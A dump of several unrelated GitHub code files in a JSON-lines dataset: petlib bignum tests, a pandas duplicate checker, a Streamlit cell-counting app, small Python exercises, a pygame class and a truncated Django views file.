Bn.from_binary(Bn(100).binary()) == 100\n\n with pytest.raises(Exception) as excinfo:\n s = 10**10\n Bn(s)\n assert 'does not fit' in str(excinfo.value)\n\n with pytest.raises(Exception) as excinfo:\n _check(False)\n assert 'BN' in str(excinfo.value)\n\n #assert Bn.from_binary(Bn(-100).binary()) != Bn(50)\n assert int(Bn(-100)) == -100\n\n assert repr(Bn(5)) == Bn(5).repr() == \"5\"\n assert range(10)[Bn(4)] == 4\n\n d = {Bn(5): 5, Bn(6): 6}\n assert Bn(5) in d\n\n\ndef test_bn_prime():\n p = Bn.get_prime(128)\n assert p > Bn(0)\n assert p.is_prime()\n assert not Bn(16).is_prime()\n assert p.num_bits() > 127\n\n\ndef test_bn_arithmetic():\n assert (Bn(1) + Bn(1) == Bn(2))\n assert (Bn(1).int_add(Bn(1)) == Bn(2))\n\n assert (Bn(1) + 1 == Bn(2))\n # assert (1 + Bn(1) == Bn(2))\n\n assert (Bn(1) + Bn(-1) == Bn(0))\n assert (Bn(10) + Bn(10) == Bn(20))\n assert (Bn(-1) * Bn(-1) == Bn(1))\n assert (Bn(-1).int_mul(Bn(-1)) == Bn(1))\n\n assert (Bn(10) * Bn(10) == Bn(100))\n assert (Bn(10) - Bn(10) == Bn(0))\n assert (Bn(10) - Bn(100) == Bn(-90))\n assert (Bn(10) + (-Bn(10)) == Bn(0))\n s = -Bn(100)\n assert (Bn(10) + s == Bn(-90))\n assert (Bn(10) - (-Bn(10)) == Bn(20))\n assert -Bn(-10) == 10\n assert Bn(-10).int_neg() == 10\n\n assert divmod(Bn(10), Bn(3)) == (Bn(3), Bn(1))\n assert Bn(10).divmod(Bn(3)) == (Bn(3), Bn(1))\n\n assert Bn(10) / Bn(3) == Bn(3)\n assert Bn(10) // Bn(3) == Bn(3)\n assert Bn(10).int_div(Bn(3)) == Bn(3)\n\n assert Bn(10) % Bn(3) == Bn(1)\n assert Bn(10).mod(Bn(3)) == Bn(1)\n\n assert Bn(2) ** Bn(8) == Bn(2 ** 8)\n assert pow(Bn(2), Bn(8), Bn(27)) == Bn(2 ** 8 % 27)\n\n pow(Bn(10), Bn(10)).binary()\n\n assert pow(Bn(2), 8, 27) == 2 ** 8 % 27\n\n assert Bn(3).mod_inverse(16) == 11\n\n with pytest.raises(Exception) as excinfo:\n Bn(3).mod_inverse(0)\n print(\"Got inverse\")\n assert 'No inverse' in str(excinfo.value)\n\n with pytest.raises(Exception) as excinfo:\n x = Bn(0).mod_inverse(Bn(13))\n print(\"!!! Got inverse\", x)\n assert 'No inverse' in str(excinfo.value)\n\n # with pytest.raises(Exception) as excinfo:\n # x = Bn(0).mod_inverse(Bn(13))\n # print(\"Got inverse\", x)\n #assert 'No inverse' in str(excinfo.value)\n\n assert Bn(10).mod_add(10, 15) == (10 + 10) % 15\n assert Bn(10).mod_sub(100, 15) == (10 - 100) % 15\n assert Bn(10).mod_mul(10, 15) == (10 * 10) % 15\n assert Bn(-1).bool()\n\n\ndef test_bn_right_arithmetic():\n assert (1 + Bn(1) == Bn(2))\n\n assert (-1 * Bn(-1) == Bn(1))\n\n assert (10 * Bn(10) == Bn(100))\n assert (10 - Bn(10) == Bn(0))\n assert (10 - Bn(100) == Bn(-90))\n assert (10 + (-Bn(10)) == Bn(0))\n s = -Bn(100)\n assert (10 + s == Bn(-90))\n assert (10 - (-Bn(10)) == Bn(20))\n\n assert divmod(10, Bn(3)) == (Bn(3), Bn(1))\n\n assert 10 / Bn(3) == Bn(3)\n assert 10 // Bn(3) == Bn(3)\n\n assert 10 % Bn(3) == Bn(1)\n assert 2 ** Bn(8) == Bn(2 ** 8)\n\n assert 100 == Bn(100)\n\n pow(10, Bn(10))\n\n\ndef test_bn_allocate():\n # Test allocation\n n0 = Bn(10)\n assert True\n\n assert str(Bn()) == \"0\"\n assert str(Bn(1)) == \"1\"\n assert str(Bn(-1)) == \"-1\"\n\n assert Bn(15).hex() == \"0F\"\n assert Bn(-15).hex() == \"-0F\"\n\n assert int(Bn(5)) == 5\n assert Bn(5).int() == 5\n\n assert 0 <= Bn(15).random() < 15\n\n # Test copy\n o0 = copy(n0)\n o1 = deepcopy(n0)\n\n assert o0 == n0\n assert o1 == n0\n\n # Test nonzero\n assert not Bn()\n assert not Bn(0)\n assert Bn(1)\n assert Bn(100)\n\n\ndef test_bn_cmp():\n assert Bn(1) < Bn(2)\n assert Bn(1) <= Bn(2)\n assert Bn(2) <= Bn(2)\n assert Bn(2) == Bn(2)\n assert not Bn(2) == None\n assert Bn(2) <= Bn(3)\n assert Bn(2) < Bn(3)\n\n\ndef test_extras():\n two = Bn(2)\n two2 = two.copy()\n assert two == two2\n\n\ndef test_odd():\n assert Bn(1).is_odd()\n assert Bn(1).is_bit_set(0)\n assert not Bn(1).is_bit_set(1)\n\n assert Bn(3).is_odd()\n assert Bn(3).is_bit_set(0)\n assert Bn(3).is_bit_set(1)\n\n assert not Bn(0).is_odd()\n assert not Bn(2).is_odd()\n\n assert Bn(100).is_bit_set(Bn(100).num_bits() - 1)\n\n\ndef test_check():\n with pytest.raises(Exception) as excinfo:\n _check(False)\n assert 'BN' in str(excinfo.value)\n\n with pytest.raises(Exception) as excinfo:\n _check(-1)\n assert 'BN' in str(excinfo.value)\n\n with pytest.raises(Exception) as excinfo:\n _check(0)\n assert 'BN' in str(excinfo.value)\n\n\ndef test_timing_exp():\n p = Bn.from_decimal(\"158261031819091141711717027498980088325079888681498417129323009913367867128038610210948802263526234270043507882496188624614467036250990588401775690578042934008692254417273606807265961724843618743242066301529332478013432957153823449143202719186309012133210922613102725038632605463022887306439116579645787938883\")\n psmall = Bn.from_decimal(\n \"90123082853250477832412338337738008391831682960497136029451532639902615425459\")\n\n xs = [p.random() for _ in range(1000)]\n ys = [p.random() for _ in range(1000)]\n\n import time\n\n print\n t0 = time.time()\n X = [xi.mod_mul(yi, psmall) for (xi, yi) in zip(xs, ys)]\n t1 = time.time()\n print(\"Mod_mul time: %.2fms\" % ((t1 - t0) * 1000.0 / 1000.0))\n\n t0 = time.time()\n X = [xi.pow(yi, p) for (xi, yi) in zip(xs, ys)]\n t1 = time.time()\n print(\" Pow time: %.2fms\" % ((t1 - t0) * 1000.0 / 1000.0))\n\n ctx = BnCtx()\n t0 = time.time()\n X = [xi.pow(yi, p, ctx) for (xi, yi) in zip(xs, ys)]\n t1 = time.time()\n print(\"Pow ctx time: %.2fms\" % ((t1 - t0) * 1000.0 / 1000.0))\n","repo_name":"gdanezis/petlib","sub_path":"petlib/bn.py","file_name":"bn.py","file_ext":"py","file_size_in_byte":27519,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"21"} +{"seq_id":"40145579227","text":"#!/bin/python\n\"\"\"\n\nTitle: check_OG_duplicates.py\nDate: 2022-03-02\nAuthor: Virág Varga\n\nDescription:\n\tThis program checks a file to see whether elements of the first column\n\t\t(Pythonic index 0; must be named \"Query\") are repeated.\n\tIt was written to determine whether orthologous clustering programs were\n\t\tclustering proteins into more than one orthologous group.\n\nList of functions:\n\tNo functions are defined in this script.\n\nList of standard and non-standard modules used:\n\tsys\n\tpandas\n\titertools\n\nProcedure:\n\t1. Loading required modules; defining inputs and outputs as command line\n\t\targuments.\n\t2. Using Pandas to import the contents of the ortholog_groups.tsv file into a\n\t\tdataframe.\n\nKnown bugs and limitations:\n\t- There is no quality-checking integrated into the code.\n\t- This program requires the input of a file with query IDs in the first column.\n\nUsage\n\t./check_OG_duplicates.py input_db\n\tOR\n\tpython check_OG_duplicates.py input_db\n\nThis script was written for Python 3.8.12, in Spyder 5.1.5.\n\n\"\"\"\n\n\n#Part1: Assign command-line arguments, import modules\n\n#import necessary modules\nimport sys #allows assignment of command line arguments\nimport os #allow access to computer files\nimport pandas as pd #facilitates manipulation of dataframes in Python\n\n#assign command line arguments; load input and output files\ninput_db = sys.argv[1]\n#input_db = \"Broccoli_OGs_parsed.txt\"\n#input_db = \"OF_OGs_parsed.txt\"\n#input_db = \"SP_OGs_parsed.txt\"\n#input_db = \"PO_OGs_parsed.txt\"\n#input_db = \"encoding_summary_ref.txt\"\n\n#used the above to queck the query ids themselves weren't replicated\n\n\n#Part 2: Check for duplicates & report results\n\n#import input database into a Pandas dataframe\northo_df = pd.read_csv(input_db, sep = '\\t', header = 0)\n\n#send query colummn to list\nquery_list = ortho_df.iloc[:, 0].to_list()\n\n\n#check if list members are entirely unique\nif(len(set(query_list)) == len(query_list)):\n\tprint(input_db + \"___ results DO NOT have duplicates among the queries!\")\nelse:\n\tprint(input_db + \" results HAVE duplicates among the queries!\")\n\tcopy_ortho_df = ortho_df.iloc[:, [0, -1]].copy()\n\t#the script works up until here\n\t#I'm able to make a dataframe with the line above that includes only the OG numbers & query IDs\n\tduplicate_df = pd.concat(g for _, g in copy_ortho_df.groupby(\"Query\") if len(g) > 1)\n\tbase = os.path.basename(input_db)\n\tout_full = os.path.splitext(base)[0]\n\toutput_file = out_full + \"_DUPLICATES.txt\"\n\tduplicate_df.to_csv(output_file, sep='\\t', index=False)\n","repo_name":"V-Varga/TrichoCompare","sub_path":"OG_Comparisons/check_OG_duplicates.py","file_name":"check_OG_duplicates.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15611630685","text":"import os\n\nimport streamlit as st\nimport cv2\nfrom PIL import Image, ImageDraw\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom model.resunet import *\nimport torchvision.transforms as T\nfrom utils import to_Tensor\nimport io\nfrom skimage.feature import peak_local_max\nfrom skimage.morphology import remove_small_holes, remove_small_objects, label\nfrom skimage.segmentation import watershed\nfrom scipy import ndimage\nfrom math import hypot\nimport numpy as np\nimport random\nimport PIL\nfrom streamlit.runtime.legacy_caching import clear_cache\n\n\nfrom src.utils import load_model\n\nfrom src.utils import *\nimport matplotlib\nmatplotlib.use('TkAgg')\n\nimport cv2\n\n@st.cache()\ndef load_model(path='../pre_trained_models', n_features_start=16, n_out=1, fine_tuning=False,\n unfreezed_layers=1, device='cpu', model_to_load='yellow'):\n \"\"\"Retrieves the trained model and maps it to the CPU by default,\n can also specify GPU here.\"\"\"\n st.session_state.result = 0\n st.session_state.post_processing = 0\n if model_to_load == 'green':\n path = os.path.join(path, \"c-resunet_g.h5\")\n elif model_to_load == 'yellow':\n path = os.path.join(path, \"c-resunet_y.h5\")\n\n if fine_tuning:\n model = load_model(resume_path=path, device=device, n_features_start=n_features_start, n_out=n_out,\n fine_tuning=fine_tuning, unfreezed_layers=unfreezed_layers).to(device)\n else:\n model = nn.DataParallel(c_resunet(arch='c-ResUnet', n_features_start=n_features_start, n_out=1, c0=True))\n try:\n if device == 'cpu':\n model.load_state_dict(torch.load(path, map_location=torch.device('cpu'))['model_state_dict'])\n else:\n model.load_state_dict(torch.load(path)['model_state_dict'])\n except:\n if device == 'cpu':\n model.load_state_dict(torch.load(path, map_location=torch.device('cpu')))\n else:\n model.load_state_dict(torch.load(path))\n\n return model\n\n@st.cache(allow_output_mutation=True)\ndef predict(model, images, device='cpu', transform=None):\n model.eval()\n preds = []\n\n if isinstance(images, list):\n for img in images:\n input_tensor = transform(img)[:3, :,:] # transforming from pil to tensor already have value between 0 and 1\n # (3, h, w) images\n input_batch = input_tensor.unsqueeze(0).to(device) # batch the image\n # TODO: when come multiple images pack in a list and iter to\n # TODO: transform in tensor or directly transform al the images in the list\n with torch.no_grad():\n preds.append(model(input_batch).detach().cpu()) # (1, h, w) size images # TODO: make for loop whne multiple files\n if device == 'cuda':\n torch.cuda.empty_cache()\n else:\n input_tensor = transform(images)[:3, :,:] # transforming from pil to tensor already have value between 0 and 1\n # (3, h, w) images\n input_batch = input_tensor.unsqueeze(0).to(device) # batch the image\n # TODO: when come multiple images pack in a list and iter to\n # TODO: transform in tensor or directly transform al the images in the list\n with torch.no_grad():\n preds.append(model(input_batch).detach().cpu()) # (1, h, w) size images # TODO: make for loop whne multiple files\n if device == 'cuda':\n torch.cuda.empty_cache()\n\n return preds\n@st.cache(allow_output_mutation=True)\ndef binarize(preds, th=0.7):\n\n if isinstance(preds, list):\n for p in preds:\n preds_t = [(np.squeeze(x[0:1, :, :]) > th) for x in preds]\n else:\n preds_t = (np.squeeze(x[0:1, :, :]) > th)\n\n return preds_t\n\n@st.cache\ndef make_post_processing(preds, area_threshold=6, min_obj_size=2, max_dist=3, foot=4):\n '''\n preds: array of tensor (ch, h, w)\n targets: array of tensor (ch, h, w)\n return:\n processed_preds: array of tensor (ch, h, w)\n targets: array of tensor (ch, h, w)\n '''\n\n if len(preds[0].shape) > 2:\n ix = np.argmin(preds[0].shape)\n if ix != 0:\n raise Exception(\"channels are not on the first dimension \\\n or are more than the spatial dimension\")\n\n # Find object in predicted image\n processed_preds = []\n for p in preds:\n\n labels_pred, nlabels_pred = ndimage.label(p)\n processed = remove_small_holes(labels_pred, area_threshold=area_threshold, connectivity=1,\n in_place=False)\n processed = remove_small_objects(processed, min_size=min_obj_size,\n connectivity=1, in_place=False)\n labels_bool = processed.astype(bool)\n distance = ndimage.distance_transform_edt(processed)\n\n maxi = ndimage.maximum_filter(distance, size=max_dist, mode='constant')\n local_maxi = peak_local_max(np.squeeze(maxi), indices=False, footprint=np.ones((foot, foot)),\n exclude_border=False,\n labels=np.squeeze(labels_bool))\n local_maxi = remove_small_objects(\n local_maxi, min_size=min_obj_size, connectivity=1, in_place=False)\n markers = ndimage.label(local_maxi)[0]\n labels = watershed(-distance, markers, mask=np.squeeze(labels_bool),\n compactness=1, watershed_line=True)\n processed_preds.append(labels.astype(\"uint8\")*255)\n\n return processed_preds\n\n\n@st.cache(allow_output_mutation=True)\ndef load_image(uploaded_file):\n print('uploading images')\n st.session_state.result = 0 # TODO: if the new images are a subset of the previous one, keen the st.session_state_result = 1\n st.session_state.post_processing = 0\n\n if isinstance(uploaded_file, list):\n if len(uploaded_file) == 0:\n filenames_to_read = os.listdir('../images')\n images = []\n for fl in filenames_to_read:\n #st.image('../images/{}'.format(fl))\n image_data = Image.open('../images/{}'.format(fl))\n img_byte_arr = io.BytesIO()\n image_data.save(img_byte_arr, format='PNG') # TODO: switch to tiff format\n image_data = img_byte_arr.getvalue()\n images.append(Image.open(io.BytesIO(image_data)))\n return images, filenames_to_read\n else:\n images = []\n filenames_to_read = []\n for img in uploaded_file:\n image_data = img.getvalue()\n filenames_to_read.append(img.name)\n images.append(Image.open(io.BytesIO(image_data)))\n return images, filenames_to_read\n ### When accept_multiple file is false:\n else:\n if uploaded_file is not None:\n image_data = uploaded_file.getvalue()\n st.image(image_data)\n return Image.open(io.BytesIO(image_data)), image_data.name\n else:\n st.image('../images/demo.tiff')\n image_data = Image.open('../images/demo.tiff')\n img_byte_arr = io.BytesIO()\n image_data.save(img_byte_arr, format='PNG') # TODO: switch to tiff format\n image_data = img_byte_arr.getvalue()\n return Image.open(io.BytesIO(image_data)), image_data.name\n\n\ndef display_images(images, filenames):\n sorted_images = images\n sorted_filenames = filenames\n\n\n if len(sorted_images) > 5:\n item_to_display = 5\n else:\n item_to_display = len(images)\n\n ncol = st.sidebar.number_input(\"how many loaded items to display\", 1, len(images), item_to_display)\n shuffle = st.sidebar.number_input(\"display in random order\", 0, 1, 0)\n\n if shuffle:\n zipped = list(zip(images, filenames))\n random.shuffle(zipped)\n images, filenams = zip(*zipped)\n cols = st.columns(ncol)\n idxs = list(range(0, len(images)))\n for i, x in enumerate(cols):\n # x.selectbox(f\"Input # {filenames[i]}\", idxs, key=i)\n cols[i].image(images[i])\n else:\n cols = st.columns(ncol)\n idxs = list(range(0, len(images)))\n for i, x in enumerate(cols):\n # x.selectbox(f\"Input # {filenames[i]}\", idxs, key=i)\n cols[i].image(images[i])\n\ndef computing_counts(images, preds):\n # extract predicted objects and counts,\n if isinstance(preds, list):\n counts = []\n bboxes_images = []\n for p, i in zip(preds, images):\n i_draw = ImageDraw.Draw(i)\n\n pred_label, pred_count = ndimage.label(p)\n pred_objs = ndimage.find_objects(pred_label)\n\n # compute centers of predicted objects\n #pred_centers = []\n for ob in pred_objs:\n #pred_centers.append(((int((ob[0].stop - ob[0].start) / 2) + ob[0].start),\n # (int((ob[1].stop - ob[1].start) / 2) + ob[1].start)))\n #cv2.rectangle(i_cv, (ob[1].start, ob[0].start), (ob[1].stop, ob[0].stop), (0, 255, 0), 4)\n i_draw.line( ((ob[1].start -20, ob[0].start -20),\n (ob[1].stop + 20, ob[0].start-20),\n (ob[1].stop +20, ob[0].stop+20),\n (ob[1].start-20, ob[0].stop+20),\n (ob[1].start-20, ob[0].start-20)), fill=\"green\", width=9)\n\n #i_draw.rectangle([(ob[1].start, ob[0].start), (ob[1].stop, ob[0].stop)], fill=None, outline='green')\n\n bboxes_images.append(i)\n counts.append(pred_count)\n return bboxes_images, counts\n\n else:\n pred_label, pred_count = ndimage.label(preds)\n pred_objs = ndimage.find_objects(pred_label)\n\n # compute centers of predicted objects\n pred_centers = []\n for ob in pred_objs:\n pred_centers.append(((int((ob[0].stop - ob[0].start) / 2) + ob[0].start),\n (int((ob[1].stop - ob[1].start) / 2) + ob[1].start)))\n\n cv2.rectangle(images, (ob[0].start, ob[0].stop), (ob[1].start, ob[1].stop))\n\n return images\n\n\ndef main():\n cuda = torch.cuda.is_available()\n device = \"cuda\" if cuda else \"cpu\"\n to_PIL = T.ToPILImage()\n\n if 'result' not in st.session_state:\n st.session_state.result = 0\n\n if 'post_processing' not in st.session_state:\n st.session_state.post_processing = 0\n\n if 'batch_counts' not in st.session_state:\n st.session_state.batch_counts = 0\n\n #check_model = st.checkbox('select model and training settings')\n uploaded_file = st.file_uploader(label='Pick an image to test', accept_multiple_files = True)\n #if check_model:\n # model_to_load = st.selectbox('which model to load', np.array(['green', 'yellow']))\n # model_training_status = st.selectbox('which model to load', np.array(['pre-trained']))\n #else:\n # model_to_load = 'green'\n # model_training_status = 'pre-training'\n\n st.info(\"Select the model to load:\")\n st.markdown(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True,\n )\n model_to_load = st.selectbox(\"\", np.array(['green', 'yellow']))\n #st.multiselect('which model to load', np.array([]))\n\n #cached\n model = load_model(device=device, model_to_load=model_to_load)\n #cached\n images, filenames = load_image(uploaded_file)\n #not chached\n display_images(images, filenames)\n\n post_processing_title = '

Post-processing parametes

'\n st.sidebar.markdown(post_processing_title, unsafe_allow_html=True)\n\n result = st.button('Make Prediction', key='make_prediction')\n if result:\n st.session_state.result = 1\n\n\n if st.session_state.result:\n confidence_threshold = st.slider(\"Confidence threshold\", 0.0, 1.0, 0.6, 0.05)\n\n preds = predict(model, images, device, transform=to_Tensor)\n preds_th = binarize(preds, th=confidence_threshold)\n preds_to_PIL = [to_PIL(x.int()*255) for x in preds_th]\n preds_to_PIL_converted = []\n\n images_boxes = []\n for i in images:\n images_boxes.append(i.copy())\n\n bboxes_pil, counts = computing_counts(images_boxes, preds_th)\n\n for i, p, c in zip(bboxes_pil, preds_to_PIL, counts):#TODO: make a function\n p = p.convert('L')\n preds_to_PIL_converted.append(p)\n\n col1, col2 = st.columns(2)\n with col1:\n st.image(i, use_column_width=True)\n st.caption('cells detected without post processing: {}'.format(c))\n #post_processing_title = '

Post-processing parametes

'\n #st.sidebar.markdown(post_processing, unsafe_allow_html=True)\n with col2:\n st.image(p, use_column_width=True)\n\n post_processing = st.button('Post-processing')\n if post_processing:\n st.session_state.post_processing = 1\n\n #reset = st.sidebar.button('reset value', key='reset_value')\n #if reset:\n # st.session_state.reset = 1\n\n if st.session_state.post_processing:\n if model_to_load == 'yellow':\n remove_small_object = st.sidebar.slider(\"small object size, suggested {}\".format(200), 0, 1000, 200, 1)\n area_threshold = st.sidebar.slider(\"minimum area to keep, suggested {}\".format(600), 0, 1000, 600, 1)\n max_dist = st.sidebar.slider(\"max_dist to define different object, suggested {}\".format(300), 0, 100, 30, 1)\n foot = st.sidebar.slider(\"foot, suggested {}\".format(400), 0, 100, 40, 1)\n elif model_to_load == 'green':\n remove_small_object = st.sidebar.slider(\"small object size to remove, suggested {}\".format(2), 0, 100, 2, 1)\n area_threshold = st.sidebar.slider(\"minimum area to keep, suggested {}\".format(6), 0, 100, 6, 1)\n max_dist = st.sidebar.slider(\"max_dist to define different object, suggested {}\".format(3), 0, 100, 3, 1)\n foot = st.sidebar.slider(\"foot, suggested {}\".format(4), 0, 100, 4, 1)\n\n if st.session_state.post_processing:\n post_processed = make_post_processing(preds_th, area_threshold=area_threshold\n , min_obj_size=remove_small_object , max_dist=max_dist, foot=foot)\n post_processed_to_PIL = [to_PIL(x) for x in post_processed]\n\n images_boxes_proc = []\n for i in images:\n images_boxes_proc.append(i.copy())\n print('postprocessing', st.session_state.post_processing)\n if st.session_state.post_processing:\n bboxes_pil_proc, counts_proc = computing_counts(images_boxes_proc, post_processed)\n\n for i, p, pp, c, cp in zip(images, bboxes_pil, bboxes_pil_proc, counts, counts_proc):#TODO: make a function\n col1, col2 = st.columns(2)\n\n with col1:\n st.image(p, use_column_width=True)\n st.caption('cells detected without post processing: {}'.format(c))\n\n with col2:\n st.image(pp, use_column_width=True)\n st.caption('cells detected with post_processing: {}'.format(cp))\n\n batch_counts = st.button('Run batch analysis TO IMPLEMENT', key='batch_analysis')\n if batch_counts:\n st.session_state.batch_counts = 1\n if st.session_state.batch_counts == 1:\n st.write('TO IMPLEMENT')\n\n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"robomorelli/cells_counting_app","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20978586873","text":"import os\ndef rename_files():\n #get file names from folder\n file_list = os.listdir(r\"/Users/vypatz/Desktop/alphabet1\")\n #print(file_list)\n saved_path = os.getcwd()\n print(\"cwd is \" + saved_path)\n os.chdir(r\"/Users/vypatz/Desktop/alphabet1\")\n\n #for each file, rename filename\n remove_these = dict((ord(char), None) for char in '0123456789')\n for file_name in file_list:\n os.rename(file_name, file_name.translate(remove_these))\n os.chdir(saved_path)\n\nrename_files()\n \n","repo_name":"vyyyy/Practice-Programming","sub_path":"udacity-python-course/rename_files.py","file_name":"rename_files.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75197640373","text":"import sys\nsys.setrecursionlimit(10 ** 9)\ninput = sys.stdin.readline\nn, m = map(int, input().split())\ngrid = list(list(map(int, input().split())) for _ in range(n))\nyear = 0\nice_cnt = 0\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\n\ndef melting_cnt(x, y):\n cnt = 0\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < m:\n if grid[nx][ny] == 0:\n cnt += 1\n return cnt\n\ndef count_ice(x, y, temp):\n temp[x][y] == 0\n\n if x < 0 or x >= n or y < 0 or y >= m:\n return\n\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if temp[nx][ny] != 0:\n count_ice(nx, ny, temp)\n\nwhile ice_cnt < 2:\n year += 1\n graph = []\n for x in range(n):\n for y in range(m):\n if grid[x][y] != 0:\n graph.append([x, y, melting_cnt(x, y)])\n\n for a in range(len(graph)):\n x = graph[a][0]\n y = graph[a][1]\n grid[x][y] -= graph[a][2]\n if grid[x][y] < 0:\n grid[x][y] = 0\n\n temp = grid\n\n for x in range(n):\n for y in range(m):\n if temp[x][y] != 0:\n ice_cnt += 1\n count_ice(x, y, temp)\n\nprint(year)","repo_name":"keeeeeey/baekjoon_algorithm","sub_path":"구현 문제/빙산.py","file_name":"빙산.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12686061910","text":"import numpy as np\nimport pygame as pg\nfrom enemy import Enemy\n\nclass Enemy_bullet:\n def __init__( self, screen, enemy: Enemy ):\n self.position = np.array( [ enemy.center[ 0 ], enemy.center[ 1 ] ] )\n self.img = pg.transform.rotate(\n pg.transform.scale(\n pg.image.load( 'assets/bullet.png' ), ( 10, 10 ) ),\n enemy.draw_angle )\n self.screen = screen\n self.delta = np.copy( enemy.delta ) / np.linalg.norm( enemy.delta )\n self.increment = 1.5\n\n def draw( self ):\n self.screen.blit( self.img, self.position )\n # pg.draw.rect( self.screen, [255,0,0], self.get_rect() )\n\n def get_rect( self ):\n return pg.Rect( self.position[ 0 ], self.position[ 1 ], 5, 5 )\n\n","repo_name":"PrinceOfCzechia/Dogfight","sub_path":"enemy_bullet.py","file_name":"enemy_bullet.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19941223341","text":"from django.shortcuts import render, redirect\r\nfrom django.contrib.auth import login, logout, authenticate\r\nfrom main.forms import *\r\nfrom .models import *\r\nfrom django.http import JsonResponse\r\nfrom django.core.paginator import Paginator\r\nfrom django.db.models import Q\r\nfrom django.core.files.base import ContentFile\r\nfrom django.core.files import File\r\n\r\nfrom rest_framework import status\r\nfrom rest_framework.decorators import api_view\r\nfrom rest_framework.response import Response\r\n\r\nimport json\r\nfrom chatall.models import Thread, ChatMessage\r\n\r\ndef get_search_query(query=None):\r\n queryset= []\r\n queries = query.split(\" \")\r\n for q in queries:\r\n if q != \"\":\r\n searchs = Room.objects.filter(\r\n Q(catagory__categoryname__icontains=q)).distinct()\r\n \r\n\r\n for post in searchs:\r\n print(post)\r\n queryset.append(post)\r\n return list(set(queryset))\r\ndef get_other_users(request):\r\n thread = Thread.objects.all()\r\n other_users = []\r\n mythread = []\r\n for t in thread:\r\n if request.user == t.first:\r\n mythread.append(t)\r\n elif request.user == t.second:\r\n mythread.append(t)\r\n for my in mythread:\r\n if request.user != my.first:\r\n other_users.append(my.first.username)\r\n if request.user != my.second:\r\n other_users.append(my.second.username)\r\n if len(other_users) != 0:\r\n return other_users[0]\r\n else:\r\n return other_users\r\ndef home_view(request):\r\n #Thread.objects.get_message()\r\n \r\n context = {}\r\n search = request.POST.get('search')\r\n if search:\r\n #users = Room.objects.filter(catagory__categoryname=search.lower())\r\n #print(users)\r\n users = get_search_query(search)\r\n catagorys = Category.objects.filter(~Q(categoryname__icontains=search.lower()))\r\n\r\n if users:\r\n context = {'ids':search,'users':users,'catagorys':catagorys}\r\n return render(request,'main/roomdetail.html',context)\r\n\r\n searchRoom = Category.objects.all()\r\n\r\n if request.user.is_authenticated:\r\n form = CompleteUserProfileForm(request.POST, request.FILES,instance=request.user)\r\n if form.is_valid():\r\n form.save()\r\n form = CompleteUserProfileForm()\r\n \r\n useraddress = request.POST.get('firstname')\r\n #searchRoom = Room.objects.filter(roomname=search)\r\n if searchRoom:\r\n room_list = searchRoom\r\n else:\r\n room_list =Room.objects.all()\r\n paginator = Paginator(room_list,4)\r\n\r\n try:\r\n page = int(request.GET.get('page','1'))\r\n except:\r\n page = 1\r\n\r\n try:\r\n rooms = paginator.page(page)\r\n except(EmptyPage, InvalidPage):\r\n rooms = paginator.page(paginator.num_pages)\r\n\r\n star = request.GET.get('starRateValue')\r\n context['rooms'] = rooms\r\n #context['star'] = star\r\n context['useraddress'] = useraddress\r\n context['catagorys'] = Category.objects.all()\r\n context['other_users'] = get_other_users(request)\r\n\r\n\r\n\r\n return render(request,'main/home.html',context)\r\n\r\n\r\n\r\n\r\ndef addroom_view(request):\r\n rate = request.POST.get('starRate')\r\n item_id = request.POST.get('item_id')\r\n #price = AddPriceBasic()\r\n if rate:\r\n rated = False\r\n response_data = {}\r\n response_data['starRate'] = rate + \" hira\"\r\n response_data['item_id'] = \"item id: \" + item_id\r\n user = request.user\r\n item = Room.objects.get(id=item_id)\r\n ra = Rate.objects.get_or_new(user,item.roomname)\r\n rt = Rate.objects.all()\r\n\r\n #for i in ite:\r\n #print(i.rate_amount)\r\n for rat in rt:\r\n ratEX = Rate.objects.get_or_new(rat.user,rat.room.roomname)\r\n if ra == ratEX:\r\n rated = True\r\n rat.rate_amount = rate\r\n rat.save(update_fields=['rate_amount'])\r\n ite = Rate.objects.set_total(item)\r\n return JsonResponse(response_data)\r\n\r\n if rated == False :\r\n rateSave = Rate.objects.create()\r\n rateSave.user = user\r\n rateSave.room = item\r\n rateSave.rate_amount = rate\r\n rateSave.save()\r\n ite = Rate.objects.set_total(item)\r\n return JsonResponse(response_data)\r\n #print(ra)\r\n\r\n context['other_users'] = get_other_users(request)\r\n else:\r\n context = {}\r\n #form = AddRoomForm(request.POST, request.FILES)\r\n form = AddServiceForm(request.POST, request.FILES)\r\n if request.POST:\r\n catagory = request.POST.get('catagory')\r\n if catagory != 'Catagory List':\r\n catagorys = Category.objects.get(categoryname=catagory)\r\n if catagorys:\r\n if form.is_valid():\r\n room = form.save(commit=False)\r\n room.catagory = catagorys\r\n room.room_user= request.user\r\n\r\n price = Price.objects.create()\r\n basic_price_title = request.POST.get('basic_price_title')\r\n basic_price = request.POST.get('basic_price')\r\n basic_price_discription = request.POST.get('basic_price_discription')\r\n basic_price_delivery = request.POST.get('basic_price_delivery')\r\n \r\n price.price_title = basic_price_title\r\n price.price_number = basic_price\r\n price.price_delivery = basic_price_delivery\r\n price.price_description = basic_price_discription\r\n \r\n price.save()\r\n\r\n pricebasic = PriceBasic.objects.create()\r\n pricebasic.price = price\r\n pricebasic.save()\r\n\r\n pricestandard = Price.objects.create()\r\n basic_price_title = request.POST.get('standard_price_title')\r\n basic_price = request.POST.get('standard_price')\r\n basic_price_discription = request.POST.get('standard_price_discription')\r\n basic_price_delivery = request.POST.get('standard_price_delivery')\r\n \r\n pricestandard.price_title = 